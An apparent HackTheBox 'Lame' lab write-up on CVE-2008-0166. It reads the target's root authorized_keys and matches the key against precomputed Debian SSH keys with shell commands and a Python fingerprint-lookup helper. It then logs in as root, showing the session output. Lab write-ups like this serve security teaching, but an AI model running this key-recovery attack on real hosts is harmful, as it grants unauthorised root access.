CVE-2008-0166


A vulnerability classified as critical was found in the Debian-patched OpenSSL packages (0.9.8c-1 up to, but not including, 0.9.8g-9), as shipped by Debian and Debian-derived distributions such as Ubuntu. The affected component is the random number generator: a Debian-specific patch removed the entropy sources from the PRNG seeding, so the only variable input left was the process ID, and every key generated with the affected library falls within a small, enumerable set. The CWE classification is CWE-310 (Cryptographic Issues). The known impact is on confidentiality: SSH keys, TLS certificates and other key material generated on affected systems can be recovered by brute force.

exploit


This is not an exploit in the usual sense. Because the vulnerable OpenSSL PRNG was seeded only with the process ID, there are at most 32,768 possible key pairs per key type, size and architecture, and all of them have been generated ahead of time. The repository below holds those precomputed key pairs; the attack is a lookup of the target's public key against that set, after which the matching private key is used as-is.

┌──(kali㉿kali)-[~/archive/htb/labs/lame]
└─$ git clone https://github.com/g0tmi1k/debian-ssh.git ; cd debian-ssh          
Cloning into 'debian-ssh'...
remote: Enumerating objects: 35, done.
remote: Total 35 (delta 0), reused 0 (delta 0), pack-reused 35
Receiving objects: 100% (35/35), 439.59 MiB | 12.79 MiB/s, done.
Resolving deltas: 100% (8/8), done.
Updating files: 100% (13/13), done.

I cloned the repository onto Kali.

Exploitation


┌──(kali㉿kali)-[~/…/htb/labs/lame/debian-ssh]
└─$ ll
total 36K
4.0K drwxr-xr-x 8 kali kali 4.0K Apr  5 07:56 .git
4.0K drwxr-xr-x 2 kali kali 4.0K Apr  5 07:56 uncommon_keys
4.0K drwxr-xr-x 6 kali kali 4.0K Apr  5 07:56 .
4.0K drwxr-xr-x 2 kali kali 4.0K Apr  5 07:56 our_tools
4.0K drwxr-xr-x 2 kali kali 4.0K Apr  5 07:56 common_keys
 12K -rw-r--r-- 1 kali kali 9.9K Apr  5 07:56 README.md
4.0K drwxr-xr-x 4 kali kali 4.0K Apr  5 07:55 ..

Besides the tooling in our_tools and the uncommon_keys set, the common_keys directory is the one to check first: it holds the key types and sizes most likely to match the SSH key on the target, which is where I hope to find the matching private key.

┌──(kali㉿kali)-[~/…/labs/lame/debian-ssh/common_keys]
└─$ ll
total 77M
4.0K drwxr-xr-x 6 kali kali 4.0K Apr  5 07:56 ..
 48M -rw-r--r-- 1 kali kali  48M Apr  5 07:56 debian_ssh_rsa_2048_x86.tar.bz2
4.0K drwxr-xr-x 2 kali kali 4.0K Apr  5 07:56 .
 30M -rw-r--r-- 1 kali kali  30M Apr  5 07:56 debian_ssh_dsa_1024_x86.tar.bz2

Inside are two archives of precomputed private SSH keys: 1024-bit DSA and 2048-bit RSA. The next step is to find the type and size of the public key in the target's authorized_keys file, so that the right archive is extracted.

daemon@lame:/$ ssh-keygen -l -f /root/.ssh/authorized_keys
2048 57:c3:11:5d:77:c5:63:90:33:2d:c5:c4:99:78:62:7a /root/.ssh/authorized_keys

The command above prints the key size and fingerprint. The public key in /root/.ssh/authorized_keys is a 2048-bit key, and the fingerprint shown is MD5, which is the default on the target's old ssh-keygen. On a current OpenSSH client, pass -E md5 to ssh-keygen -l; otherwise a SHA256 fingerprint is printed, which does not correspond to the file names used in the repository.

┌──(kali㉿kali)-[~/…/labs/lame/debian-ssh/common_keys]
└─$ tar -xf debian_ssh_rsa_2048_x86.tar.bz2

I then extract the 2048-bit RSA archive and search it for the public key string from authorized_keys:

┌──(kali㉿kali)-[~/…/labs/lame/debian-ssh/common_keys]
└─$ grep -r 'AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w==' ./rsa/2048
./rsa/2048/57c3115d77c56390332dc5c49978627a-5429.pub:ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== root@targetcluster

I got a match: 57c3115d77c56390332dc5c49978627a-5429.pub holds exactly the public key from authorized_keys. The file name is the MD5 fingerprint ssh-keygen reported (57:c3:11:5d:...) with the colons removed, followed by the PID the key was generated under (5429), so the fingerprint alone already identifies the file without the grep. The private counterpart, 57c3115d77c56390332dc5c49978627a-5429, sits next to it and can be used directly to SSH into the target as root. The key file must be mode 0600 for ssh to accept it, and because the target's old sshd only accepts SHA-1 RSA signatures, a current OpenSSH client may also need -oPubkeyAcceptedAlgorithms=+ssh-rsa in addition to the HostKeyAlgorithms option used below.
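To make the fingerprint-to-file-name step and the grep match above reproducible offline, here is an added example (my own code, not part of the original write-up or the debian-ssh repository). It parses the authorized_keys line shown above in OpenSSH wire format, computes the MD5 fingerprint that ssh-keygen -l -E md5 prints, and derives the debian-ssh file name stem (MD5 hex without colons, followed by -<pid>) to pick the private key out of a directory listing. The directory listing in the usage is constructed; the naming convention is the one visible in the grep output. If the key text was transcribed faithfully, the fingerprint it computes is the one ssh-keygen printed on the target.

```python
"""Added example: OpenSSH public key parsing, MD5 fingerprint and debian-ssh
file name lookup (not code from the original write-up or the repository)."""
import base64
import hashlib
import struct

# The authorized_keys entry from the target, copied from the grep match above.
AUTHORIZED_KEY = (
    "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== root@targetcluster"
)


def parse_ssh_pubkey(line: str) -> dict:
    """Decode one authorized_keys line into its wire-format fields.

    The base64 blob is a sequence of length-prefixed strings: the key type,
    then (for ssh-rsa) the public exponent e and the modulus n as big-endian
    mpints. The blob is what ssh-keygen hashes for the fingerprint.
    """
    fields = line.split()
    if len(fields) < 2:
        raise ValueError("expected '<type> <base64> [comment]'")
    key_type, blob = fields[0], base64.b64decode(fields[1])
    parts = []
    offset = 0
    while offset < len(blob):
        (length,) = struct.unpack(">I", blob[offset:offset + 4])
        offset += 4
        parts.append(blob[offset:offset + length])
        offset += length
    if parts[0].decode() != key_type:
        raise ValueError("key type inside blob does not match the prefix")
    info = {"type": key_type, "blob": blob, "comment": " ".join(fields[2:])}
    if key_type == "ssh-rsa":
        e = int.from_bytes(parts[1], "big")
        n = int.from_bytes(parts[2], "big")   # leading 0x00 pad is harmless here
        info.update(e=e, n=n, bits=n.bit_length())
    return info


def md5_fingerprint(blob: bytes) -> str:
    """Colon-separated MD5 of the raw key blob, as 'ssh-keygen -l -E md5' shows it."""
    digest = hashlib.md5(blob).hexdigest()
    return ":".join(digest[i:i + 2] for i in range(0, 32, 2))


def debian_ssh_stem(fingerprint: str) -> str:
    """File name stem used by the debian-ssh key set: MD5 hex without colons."""
    return fingerprint.replace(":", "")


def find_key_files(fingerprint: str, listing) -> list:
    """Return private key file names from a directory listing that match
    <stem>-<pid>; the .pub sibling is skipped so only the usable key remains."""
    stem = debian_ssh_stem(fingerprint)
    matches = []
    for name in listing:
        if name.endswith(".pub"):
            continue
        head, sep, pid = name.rpartition("-")
        if sep and head == stem and pid.isdigit():
            matches.append(name)
    return matches


if __name__ == "__main__":
    key = parse_ssh_pubkey(AUTHORIZED_KEY)
    fp = md5_fingerprint(key["blob"])
    print(key["bits"], fp, key["comment"])        # mirrors 'ssh-keygen -l -E md5'
    # Constructed listing standing in for rsa/2048/ after extraction.
    listing = [debian_ssh_stem(fp) + "-5429", debian_ssh_stem(fp) + "-5429.pub"]
    print(find_key_files(fp, listing))
```

Running it prints the key size and MD5 fingerprint in the same form as the ssh-keygen output on the target, and the private key file name to pass to ssh -i. Matching on the fingerprint is cheaper than grepping 32,768 .pub files, and the same function works for the DSA archive, since the file naming is the same.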

┌──(kali㉿kali)-[~/archive/htb/labs/lame]
└─$ ssh root@$IP -i debian-ssh/common_keys/rsa/2048/57c3115d77c56390332dc5c49978627a-5429 -oHostKeyAlgorithms=+ssh-dss,ssh-rsa
Last login: Tue Apr  7 10:33:18 2020 from :0.0
Linux lame 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
 
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
 
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
 
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have new mail.
 
root@lame:~# whoami
root
root@lame:~# hostname
lame
root@lame:~# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:50:56:b9:b0:52  
          inet addr:10.10.10.3  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: dead:beef::250:56ff:feb9:b052/64 Scope:Global
          inet6 addr: fe80::250:56ff:feb9:b052/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:364197 errors:0 dropped:0 overruns:0 frame:0
          TX packets:7011 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:33735035 (32.1 MB)  TX bytes:966387 (943.7 KB)
          Interrupt:19 Base address:0x2024 
 
lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:1565 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1565 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:756377 (738.6 KB)  TX bytes:756377 (738.6 KB)

System Level Compromise